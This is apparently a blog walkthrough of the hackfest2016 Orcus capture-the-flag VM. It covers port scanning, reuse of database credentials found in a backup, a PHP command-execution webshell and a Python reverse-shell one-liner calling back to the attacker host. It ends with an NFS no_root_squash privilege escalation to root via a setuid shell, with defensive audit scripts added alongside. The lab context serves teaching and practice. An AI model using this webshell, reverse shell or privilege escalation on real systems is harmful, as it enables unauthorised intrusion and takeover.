Mr_H4sh

Infosec, CTF and more

hackfest2016: Orcus Solution

In this post I'm going to show you how to solve hackfest2016: Orcus, a VM provided by Viper.

You can find the VM on this link

The goal of the VM is to gain root access to the machine and capture 4 flags.

Attacker: 192.168.56.1
Victim: 192.168.56.102

I run an nmap scan against all TCP ports, and this is what I get:

Increasing send delay for 192.168.56.102 from 0 to 5 due to 5535 out of 13837 dropped probes since last increase.
Nmap scan report for 192.168.56.102
Host is up (0.00028s latency).
Not shown: 65511 closed ports
PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp    open     domain      ISC BIND 9.10.3-P4-Ubuntu
80/tcp    open     http        Apache httpd 2.4.18 ((Ubuntu))
110/tcp   open     pop3        Dovecot pop3d
111/tcp   open     rpcbind     2-4 (RPC #100000)
139/tcp   open     netbios-ssn Samba smbd 3.X (workgroup: ORCUS)
143/tcp   open     imap        Dovecot imapd
443/tcp   open     ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
445/tcp   open     netbios-ssn Samba smbd 3.X (workgroup: ORCUS)
993/tcp   open     ssl/imap    Dovecot imapd
995/tcp   open     ssl/pop3    Dovecot pop3d
2049/tcp  open     nfs         2-4 (RPC #100003)
10006/tcp filtered unknown
25399/tcp filtered unknown
27416/tcp filtered unknown
34024/tcp filtered unknown
37414/tcp open     mountd      1-3 (RPC #100005)
37423/tcp open     nlockmgr    1-4 (RPC #100021)
44483/tcp open     mountd      1-3 (RPC #100005)
45465/tcp filtered unknown
50200/tcp filtered unknown
50614/tcp open     mountd      1-3 (RPC #100005)
55312/tcp filtered unknown
56207/tcp filtered unknown
MAC Address: 08:00:27:0B:43:51 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

I see that ports 139 and 445 are open, so I run enum4linux to gather information about the system. It reports a user called kippo, and since two ports are serving SSH (22 and 443) I wonder whether the Kippo SSH honeypot is installed on the box.

Port 2049 (NFS) is also open, which means there may be an export I can mount. showmount confirms that /tmp is exported to everyone:

$ showmount -e 192.168.56.102
Export list for 192.168.56.102:
/tmp *

I enumerate the site with dirb and mirror every directory it finds with wget:

$ dirb http://192.168.56.102/ big.txt | tee dirb_192.168.56.102.txt
$ grep DIRECTORY dirb_192.168.56.102.txt | tee 192.168.56.102_80_directories.txt
==> DIRECTORY: http://192.168.56.102/FCKeditor/                                                                                   
==> DIRECTORY: http://192.168.56.102/admin/                                                                                       
==> DIRECTORY: http://192.168.56.102/backups/                                                                                     
==> DIRECTORY: http://192.168.56.102/cron/                                                                                        
==> DIRECTORY: http://192.168.56.102/external/                                                                                    
==> DIRECTORY: http://192.168.56.102/files/                                                                                       
==> DIRECTORY: http://192.168.56.102/framework/                                                        
[...]
$ cat 192.168.56.102_80_directories.txt | cut -d " " -f 3 > url_directories.txt
$ for directory in $(cat url_directories.txt); do wget -r -p -E -k $directory; done;
--2017-03-21 09:17:47--  http://192.168.56.102/FCKeditor/
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 749 [text/html]
Saving to: ‘192.168.56.102/FCKeditor/index.html’

192.168.56.102/FCKeditor/index.h 100%[=========================================================>]     749  --.-KB/s    in 0s      

2017-03-21 09:17:47 (57.4 MB/s) - ‘192.168.56.102/FCKeditor/index.html’ saved [749/749]

Loading robots.txt; please ignore errors.
--2017-03-21 09:17:47--  http://192.168.56.102/robots.txt
Reusing existing connection to 192.168.56.102:80.
HTTP request sent, awaiting response... 200 OK
Length: 1347 (1.3K) [text/plain]
Saving to: ‘192.168.56.102/robots.txt’

192.168.56.102/robots.txt        100%[=========================================================>]   1.32K  --.-KB/s    in 0s      

2017-03-21 09:17:47 (102 MB/s) - ‘192.168.56.102/robots.txt’ saved [1347/1347]

[...]

$ ls -l
total 4
drwxrwxrwx 1 anthony anthony 4096 Mar 21 09:18 192.168.56.102
$ ls -l 192.168.56.102/
total 397
drwxrwxrwx 1 anthony anthony      0 Mar 21 09:18 admin
drwxrwxrwx 1 anthony anthony   4096 Mar 21 09:17 backups
drwxrwxrwx 1 anthony anthony   4096 Mar 21 09:17 cron
drwxrwxrwx 1 anthony anthony   8192 Mar 21 09:18 external
drwxrwxrwx 1 anthony anthony   4096 Mar 21 09:17 FCKeditor
drwxrwxrwx 1 anthony anthony      0 Mar 21 09:18 files
drwxrwxrwx 1 anthony anthony   4096 Mar 21 09:18 framework
-rwxrwxrwx 1 anthony anthony 126042 Oct 29 01:11 Hack_The_Planet3.jpg
drwxrwxrwx 1 anthony anthony   4096 Mar 21 09:18 icons
-rwxrwxrwx 1 anthony anthony    101 Mar 21 09:18 index.html
drwxrwxrwx 1 anthony anthony   4096 Mar 21 09:18 install
-rwxrwxrwx 1 anthony anthony 232182 Oct 29 01:10 Orcus.jpg
drwxrwxrwx 1 anthony anthony      0 Mar 21 09:18 phpmyadmin
-rwxrwxrwx 1 anthony anthony   1347 Nov  2 02:46 robots.txt
drwxrwxrwx 1 anthony anthony   4096 Mar 21 09:18 themes
drwxrwxrwx 1 anthony anthony      0 Mar 21 09:18 tmp
drwxrwxrwx 1 anthony anthony   4096 Mar 21 09:18 zenphoto

I see that the backups folder contains the file SimplePHPQuiz.tar.gz. I extract it, and in SimplePHPQuiz/includes/db_conn.php I find database credentials:

DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

So the credentials are dbuser:dbpassword. I try them on both http://192.168.56.102/phpmyadmin/ and http://192.168.56.102/zenphoto, and they work on both.

In Zenphoto I set up an admin user with the credentials admin:admin123admin.

With that account I manage to upload a shell through http://192.168.56.102/zenphoto/zp-core/admin-upload.php?page=upload&tab=http&type=images.

I create a zip file that contains a file called shell.php with the following content (a minimal webshell: whatever arrives in the cmd parameter is passed to system() and the output is echoed back):

<?php
// Minimal command-execution webshell: runs the cmd parameter (GET or POST)
// with system() and returns the output inside a <pre> block.
if (isset($_REQUEST['cmd'])) {
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);   // command output is written straight into the response
        echo "</pre>";
        die;
}
?>

So I create shell.php.zip, upload it through that page, and visit http://192.168.56.102/zenphoto/albums/zip1/, where a directory listing shows my shell.php. I try http://192.168.56.102/zenphoto/albums/zip1/shell.php?cmd=id and find out that I'm running as www-data.

I then use the webshell to launch a Python reverse shell back to my machine. The decoded payload is:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

URL-encoded in the cmd parameter, the request is http://192.168.56.102/zenphoto/albums/zip1/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.1%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27 and I get a reverse shell on my listener:

$ nc -lnvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.56.102] port 4444 [tcp/*] accepted (family 2, sport 57400)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ /sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 08:00:27:0b:43:51  
          inet addr:192.168.56.102  Bcast:192.168.56.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3658319 errors:287 dropped:0 overruns:0 frame:0
          TX packets:3645099 errors:3 dropped:0 overruns:0 carrier:3
          collisions:0 txqueuelen:1000 
          RX bytes:722504268 (722.5 MB)  TX bytes:1933335679 (1.9 GB)
          Interrupt:10 Base address:0xd020 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:40208 errors:0 dropped:0 overruns:0 frame:0
          TX packets:40208 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:2952730 (2.9 MB)  TX bytes:2952730 (2.9 MB)

$ hostname
Orcus
$ cat /var/www/flag.txt
/var/www/flag.txt
868c889965b7ada547fae81f922e45c4

First flag taken.

In /var/www/html/backups/ssh-creds.bak I find the following:

www-data@Orcus:/var/www/html/backups$ cat ssh-creds.bak
cat ssh-creds.bak
root:123456

This must be a troll, but you never know. I'll keep it in my notes.

So, I go ahead and check the /etc/passwd file:

www-data@Orcus:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
bind:x:104:114::/var/cache/bind:/bin/false
postfix:x:105:115::/var/spool/postfix:/bin/false
dovecot:x:106:117:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:107:118:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:108:119::/var/lib/landscape:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:110:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
avahi:x:111:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:112:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
kippo:x:1001:27::/home/kippo:/bin/bash
statd:x:113:65534::/var/lib/nfs:/bin/false
systemd-timesync:x:114:125:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:115:126:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:116:127:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:117:128:systemd Bus Proxy,,,:/run/systemd:/bin/false
uuidd:x:100:101::/run/uuidd:/bin/false
lxd:x:118:65534::/var/lib/lxd/:/bin/false
_apt:x:119:65534::/nonexistent:/bin/false
dnsmasq:x:120:65534:dnsmasq,,,:/var/lib/misc:/bin/false

Port 2049 is open, and /etc/exports shows that /tmp is exported to any host (*) read-write with no_root_squash, so root on an NFS client keeps uid 0 on the exported files instead of being mapped to nobody. Lucky me!

www-data@Orcus:/$ cat /etc/exports
cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#		to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,no_root_squash)
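The check a practitioner wants for this finding, as an added example that is not part of the original post: a small audit of an exports file that reports every client entry with no_root_squash, and notes whether it is also rw and open to any host (*), which is the combination that makes the attack below possible. The exports text is constructed for the example; only the /tmp line is Orcus's.

```sh
#!/bin/sh
# Added example (not from the original post): audit /etc/exports for
# no_root_squash. Input is exports(5) text on stdin; each reported line is
# "<path> <client> <reasons>".

# Constructed sample; only the /tmp line matches the Orcus box.
SAMPLE_EXPORTS='# /etc/exports: constructed sample for the audit below
/tmp *(rw,no_root_squash)
/srv/homes hostname1(rw,sync,no_subtree_check) hostname2(rw,no_root_squash)
/srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
/data *(ro,no_root_squash)
/backup 10.0.0.5
'

# Clients with no option list get the exports(5) defaults (ro, root_squash)
# and are never reported. Each client on a line is examined separately.
risky_exports() {
  grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*$' |
  while read -r path clients; do
    printf '%s\n' "$clients" | tr ' \t' '\n\n' | while read -r client; do
      [ -n "$client" ] || continue
      case $client in
        *\(*\)) host=${client%%\(*}; opts=${client#*\(}; opts=${opts%\)} ;;
        *)      host=$client; opts="" ;;
      esac
      # root_squash is only defeated by an explicit no_root_squash
      case ",$opts," in *,no_root_squash,*) ;; *) continue ;; esac
      reasons="no_root_squash"
      case ",$opts," in *,rw,*) reasons="$reasons,rw" ;; esac
      [ "$host" = "*" ] && reasons="$reasons,any-host"
      printf '%s %s %s\n' "$path" "$host" "$reasons"
    done
  done
}

# Number of risky entries, for a pass/fail check in a hardening script.
risky_export_count() {
  risky_exports | wc -l | tr -d ' '
}

printf '%s' "$SAMPLE_EXPORTS" | risky_exports
```

Run it against the real file with `risky_exports < /etc/exports`. The fix for the Orcus line is to drop no_root_squash (root_squash is the default) and restrict the client, for example `/tmp 192.168.56.0/24(rw,root_squash)`; independently, mounting /tmp with nosuid on the server would stop a setuid file placed there from ever elevating, even with the export left as it is.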

I copy /bin/sh into /tmp, then mount the export on my machine and, as root there, set the SUID bit on a root-owned copy:

On the Victim's Machine:

www-data@Orcus:/tmp$ cp /bin/sh .
cp /bin/sh .
www-data@Orcus:/tmp$ ls -la
ls -la
total 220
drwxrwxrwt  9 root     root       4096 Mar 20 09:40 .
drwxr-xr-x 24 root     root       4096 Oct 30 23:05 ..
drwxrwxrwt  2 root     root       4096 Mar 20 04:51 .ICE-unix
drwxrwxrwt  2 root     root       4096 Mar 20 04:51 .Test-unix
drwxrwxrwt  2 root     root       4096 Mar 20 04:51 .X11-unix
drwxrwxrwt  2 root     root       4096 Mar 20 04:51 .XIM-unix
drwxrwxrwt  2 root     root       4096 Mar 20 04:51 .font-unix
-rwxr-xr-x  1 www-data www-data 173644 Mar 20 09:40 sh
drwx------  3 root     root       4096 Mar 20 04:51 systemd-private-318297eca1cd42348ed8da4c63e2f698-dovecot.service-7G0NXL
drwx------  3 root     root       4096 Mar 20 04:51 systemd-private-318297eca1cd42348ed8da4c63e2f698-systemd-timesyncd.service-8PuvUn

Then, as root on my machine inside the mounted export (so the new file is owned by root:root on Orcus, thanks to no_root_squash), I create a copy of the shell, make it executable and set the SUID bit:

On the Attacker's Machine:

# cat ./sh > root_shell
# chmod 4777 root_shell

Then I run it on the victim's machine with -p, so the shell keeps the setuid effective uid instead of resetting it to the real uid, and I become root:

www-data@Orcus:/tmp$ ls -l
ls -l
total 364
-rwxr-xr-x 1 www-data www-data   9163 Mar 20 09:12 enum.sh
-rwsrwxrwx 1 root     root     173644 Mar 20 10:10 root_shell
-rwxr-xr-x 1 www-data www-data 173644 Mar 20 09:40 sh
drwx------ 3 root     root       4096 Mar 20 04:51 systemd-private-318297eca1cd42348ed8da4c63e2f698-dovecot.service-7G0NXL
drwx------ 3 root     root       4096 Mar 20 04:51 systemd-private-318297eca1cd42348ed8da4c63e2f698-systemd-timesyncd.service-8PuvUn
www-data@Orcus:/tmp$ ./root_shell -p
./root_shell -p
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

# cat /root/flag.txt
cat /root/flag.txt
807307b49314f822985d0410de7d8bfe
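The artefact this leaves behind is a world-writable setuid file owned by root in /tmp (-rwsrwxrwx root root root_shell above). As an added example that is not part of the original post, here is the check to find such files, the one a defender, or the next tester on the box, should run over /tmp, /var/tmp, /dev/shm and every NFS export. The demo directory is constructed with a file owned by the current user so it runs without privileges.

```sh
#!/bin/sh
# Added example (not from the original post): hunt for setuid files, and for
# the worse case of setuid files anybody can also overwrite, under a directory.

# Setuid regular files under $1; -xdev keeps find on the same filesystem.
suid_files() {
  find "$1" -xdev -type f -perm -4000 -print 2>/dev/null | sort
}

# Setuid files that are also world-writable (both the 4000 and 0002 bits set),
# the exact shape of the root_shell dropped above.
world_writable_suid() {
  find "$1" -xdev -type f -perm -4002 -print 2>/dev/null | sort
}

# Offline demo on a constructed directory (the files are owned by the
# caller, not root; only the mode bits matter for the check).
demo() {
  d=$(mktemp -d)
  : > "$d/root_shell"; chmod 4777 "$d/root_shell"   # what the attack leaves behind
  : > "$d/sh";         chmod 0755 "$d/sh"           # plain copy, not setuid
  echo "setuid files under $d:";                suid_files "$d"
  echo "world-writable setuid files under $d:"; world_writable_suid "$d"
  rm -rf "$d"
}
demo
```

On a real box, compare the setuid list against the package manager's view (dpkg -S on each hit) so that anything outside a package stands out, as root_shell would.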

Got root (effective uid 0; as id shows, the real uid is still 33) and the flag, and added my SSH key to get a more stable shell.

I wander around, and since I found the kippo user for the Kippo honeypot I check its configuration. I get lucky: /etc/kippo/data/userdb.txt contains the flag:

root@Orcus:/etc/kippo/data# cat userdb.txt 
root:0:123456
fakuser:1:TH!SP4SSW0RDIS4Fl4G!

Now I understand the purpose of the file ssh-creds.bak.

At the time of writing I've found just three flags. I've also played with Sedna (but I haven't released a write-up, because the only privilege escalation exploit I found was DirtyC0W and the system kept crashing), but I can't really tell what is different between this VM and the other systems, so my path finishes here. Of course, if you find another flag, please leave a comment.

Thank you to Viper for the VM and Vulnhub for hosting it.